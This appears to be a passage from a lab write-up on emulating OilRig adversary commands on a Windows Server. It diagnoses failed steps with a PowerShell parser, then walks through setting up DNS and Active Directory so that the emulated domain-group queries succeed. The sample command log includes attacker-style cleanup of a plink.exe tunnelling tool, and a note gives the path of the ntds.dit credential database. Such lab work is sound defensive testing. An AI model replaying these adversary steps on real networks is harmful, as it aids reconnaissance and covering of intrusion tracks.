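  {"adversary":"OilRig","command":"del C:\\Users\\gosta\\AppData\\Roaming\\fsociety.dat C:\\Users\\Public\\Downloads\\plink.exe;",
   "stdout":"","stderr":"The system cannot find the path specified.","exit_code":1},
  {"adversary":"OtherAdversary","command":"whoami","stdout":"(constructed)","stderr":"","exit_code":0}
]
'@

# Known failure signatures, matched against stderr in order; the first hit wins.
# Causes and fixes are the ones worked out in the analysis above.
$failureRules = @(
  @{ Pattern = 'System error 1355'
     Cause   = 'host is in a WORKGROUP, not a domain'
     Fix     = 'join the server to an AD DS domain, or leave out the /domain queries' },
  @{ Pattern = 'unable to find the specified registry key'
     Cause   = 'registry key does not exist on this host'
     Fix     = 'the key is only created by RDP client use; treat an empty result as expected' },
  @{ Pattern = 'cannot find the path specified'
     Cause   = 'one or more target files are absent'
     Fix     = 'make the step conditional on Test-Path, or make sure the earlier step creates the file' }
)

function Get-CommandReport {
  param(
    [Parameter(Mandatory)] [string] $Json,
    [string] $Adversary = 'OilRig'
  )
  # -InputObject rather than the pipeline: Windows PowerShell 5.1 emits a JSON
  # array as one object, and foreach enumerates it correctly either way.
  $records = ConvertFrom-Json -InputObject $Json
  foreach ($r in $records) {
    if ($r.adversary -ne $Adversary) { continue }
    $ok     = ($r.exit_code -eq 0)
    $status = 'OK'
    $cause  = ''
    $fix    = ''
    if (-not $ok) {
      $status = 'FAILED'
      $rule = $failureRules | Where-Object { $r.stderr -match $_.Pattern } | Select-Object -First 1
      if ($rule) { $cause = $rule.Cause; $fix = $rule.Fix }
      else       { $cause = 'unclassified; inspect stderr' }
    }
    [pscustomobject]@{
      Status   = $status
      ExitCode = $r.exit_code
      Command  = $r.command
      Cause    = $cause
      Fix      = $fix
    }
  }
}

$report = @(Get-CommandReport -Json $sampleJson)
$report | Format-Table Status, ExitCode, Command, Cause -AutoSize -Wrap

$failed = @($report | Where-Object { $_.Status -eq 'FAILED' })
"{0} of {1} OilRig commands failed" -f $failed.Count, $report.Count
# One line per root cause, so a single fix (here: domain join) can be weighed
# against how many steps it unblocks.
$failed | Group-Object Cause | ForEach-Object { "{0} x {1}" -f $_.Count, $_.Name }
```

Against the real file, replace `$sampleJson` with `Get-Content -Raw commands-output.json`; the exit code alone separates the two classes, and the stderr rules only explain the failed ones.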
Corrective Measures
Joining the server to an Active Directory Domain
Install the DNS Server Role
1. Open Server Manager:
- Click Start and open Server Manager (it usually opens by default on startup).
2. Add Roles and Features:
- In Server Manager, click Manage in the top right, then select Add Roles and Features.
3. Begin the Installation Wizard:
- Click Next on the Before You Begin page.
- Choose Role-based or feature-based installation and click Next.
4. Select the Server:
- Select your local server from the list and click Next.
5. Choose DNS Server:
- In the Roles list, check the box for DNS Server.
- Click Add Features when prompted to add any required features, then click Next.
6. Add Any Necessary Features:
- Click Next to bypass the Features page, as no additional features are required for a DNS Server setup.
7. Confirm and Install:
- Review your selections and click Install.
- Wait for the installation to complete, and then click Close when done.
Configure DNS to Support the AD DS Domain
After the DNS role is installed, you’ll need to set up a Forward Lookup Zone to support AD DS.
1. Open DNS Manager:
- In Server Manager, go to Tools > DNS to open the DNS Manager console.
2. Create a Forward Lookup Zone:
- In DNS Manager, right-click on Forward Lookup Zones and select New Zone.
- This will open the New Zone Wizard. Click Next.
3. Configure Zone Settings:
Zone Type: Select Primary Zone and ensure the box for Store the zone in Active Directory is checked (this option appears if AD DS has already been installed).
Replication Scope: Choose To all DNS servers in this domain.
Zone Name: Enter the domain name you intend to use for your AD DS domain (e.g., example.com). Click Next.
4. Dynamic Updates:
Enable Allow only secure dynamic updates to ensure that only authorized clients can update DNS records.
Click Next and then Finish to complete the zone creation.
5. Confirm DNS Zone Creation:
- You should now see the new forward lookup zone (e.g., example.com) under Forward Lookup Zones in DNS Manager.
6. Set DNS Server IP in Network Settings:
- To ensure the server can resolve its own domain records, configure its network adapter to use its own IP address as the Preferred DNS Server.
- Go to Settings > Network & Internet > Ethernet > Change adapter options.
- Right-click your network connection and select Properties.
- Select Internet Protocol Version 4 (TCP/IPv4), click Properties, and set the Preferred DNS server to the server’s own IP address.
DNS Server Role features
- .NET Framework 4.8 Features (2 of 7 installed)
- Microsoft Defender (installed)
- Remote Server Administration Tools (NOT INSTALLED; this is where the AD DS and DNS Server management tools live, and the AD DS role wizard adds them when you click Add Features)
- System Data Archiver (installed)
- Windows PowerShell (installed, version 5.1)
- WoW64 Support (installed)
- XPS Viewer (installed)
Install the Active Directory Domain Services (AD DS) Role
Open Server Manager:
- Click on Start and select Server Manager (it usually opens automatically on startup).
Add Roles and Features:
- In Server Manager, click on Manage in the top right, then choose Add Roles and Features.
Begin the Installation Wizard:
- Click Next through the Before You Begin screen.
- Choose Role-based or feature-based installation and click Next.
Select the Server:
- Select the local server you are configuring and click Next.
Select Server Roles:
- In the Roles section, check the box for Active Directory Domain Services.
- Click Add Features when prompted to add any required features, then click Next.
Add Necessary Features:
- In the Features section, the necessary components for AD DS should already be selected. Click Next.
Confirm and Install:
- Review your selections and click Install.
- Wait for the installation to complete, but do not close the wizard as you will proceed with the AD DS configuration after installation.
Creating Organizational Unit Groups
- We create the following groups, which are the ones the failed `net group ... /domain` queries above look up:
  - "Exchange Trusted Subsystem"
  - "SQL Admins"
SECURITY KNOWLEDGE
- The zone has an option Allow only secure dynamic updates to ensure that only authorized clients can update DNS records. With it enabled, a host must authenticate to the domain before it can register or overwrite a record, so an unauthenticated machine on the same LAN cannot claim another host's name; the option is only offered for zones stored in Active Directory.
- Some paths where AD DS deploys its database, log files, and the SYSVOL folder:
  - C:\Windows\NTDS (the ntds.dit directory database and its transaction logs)
  - C:\Windows\SYSVOL (Group Policy templates and logon scripts, replicated between domain controllers)
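The same build-out as the Server Manager walkthroughs above (DNS role, AD DS role, forward lookup zone with secure dynamic updates, the two groups) and the checks from the SECURITY KNOWLEDGE notes, as one added PowerShell script for Windows Server 2022. This is example code, not something the page's author ran. Assumptions: the domain name example.com used in the zone step, a NetBIOS name of EXAMPLE, the adapter alias Ethernet and the static address 192.168.1.21 from the systeminfo output, and that the script runs elevated. Promotion reboots the host, so the script has two phases.

```powershell
# Added example, not code from the original page. Run as Administrator:
#   .\Build-LabDomain.ps1 -Phase Promote   (reboots when promotion finishes)
#   .\Build-LabDomain.ps1 -Phase Finish    (after the reboot, as a domain admin)
# Assumed values: example.com / EXAMPLE, adapter "Ethernet", IP 192.168.1.21.
[CmdletBinding()]
param(
  [Parameter(Mandatory)] [ValidateSet('Promote', 'Finish')] [string] $Phase,
  [string] $DomainName  = 'example.com',
  [string] $NetbiosName = 'EXAMPLE',
  [string] $Adapter     = 'Ethernet',
  [string] $ServerIp    = '192.168.1.21'
)

switch ($Phase) {
  'Promote' {
    # The two "Add Roles and Features" walkthroughs. -IncludeManagementTools
    # pulls in the RSAT pieces (ActiveDirectory and DnsServer modules) that the
    # feature list above showed as NOT INSTALLED.
    Install-WindowsFeature -Name DNS, AD-Domain-Services -IncludeManagementTools

    # Step 6 of the DNS section: the server resolves against itself.
    Set-DnsClientServerAddress -InterfaceAlias $Adapter -ServerAddresses $ServerIp

    # First DC of a new forest. -InstallDns creates the AD-integrated forward
    # lookup zone for $DomainName and sets it to secure dynamic updates only,
    # which is what the New Zone wizard steps configure by hand.
    $dsrm = Read-Host -AsSecureString -Prompt 'Directory Services Restore Mode password'
    Install-ADDSForest -DomainName $DomainName -DomainNetbiosName $NetbiosName `
      -InstallDns -SafeModeAdministratorPassword $dsrm -Force
    # Install-ADDSForest restarts the server when it completes.
  }

  'Finish' {
    Import-Module ActiveDirectory, DnsServer

    # The groups that the emulated OilRig `net group ... /domain` steps query.
    foreach ($g in 'Exchange Trusted Subsystem', 'SQL Admins') {
      if (-not (Get-ADGroup -Filter "Name -eq '$g'")) {
        New-ADGroup -Name $g -GroupScope Global -GroupCategory Security
      }
    }

    # Checks for the SECURITY KNOWLEDGE points: the zone must be AD-integrated
    # and accept only secure dynamic updates, and the directory database and
    # SYSVOL must be where the notes say they are.
    $zone = Get-DnsServerZone -Name $DomainName
    if ($zone.DynamicUpdate -ne 'Secure') {
      # Closes the gap if the zone was created by hand without the option.
      Set-DnsServerPrimaryZone -Name $DomainName -DynamicUpdate Secure
      $zone = Get-DnsServerZone -Name $DomainName
    }
    [pscustomobject]@{
      Zone           = $zone.ZoneName
      ADIntegrated   = $zone.IsDsIntegrated        # expect True
      DynamicUpdate  = $zone.DynamicUpdate         # expect Secure
      NtdsDit        = Test-Path 'C:\Windows\NTDS\ntds.dit'
      Sysvol         = Test-Path 'C:\Windows\SYSVOL\sysvol'
      SqlAdminsGroup = [bool](Get-ADGroup -Filter "Name -eq 'SQL Admins'")
    }
  }
}
```

After the Finish phase, `net group "SQL Admins" /domain` on the server returns the group instead of System error 1355, which is the check that the corrective measure worked. The script lets `Install-ADDSForest -InstallDns` create the zone rather than building a file-backed primary zone first: a zone can only be stored in Active Directory once AD DS exists, so creating it during promotion gives the secure-updates-only setting in one step.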

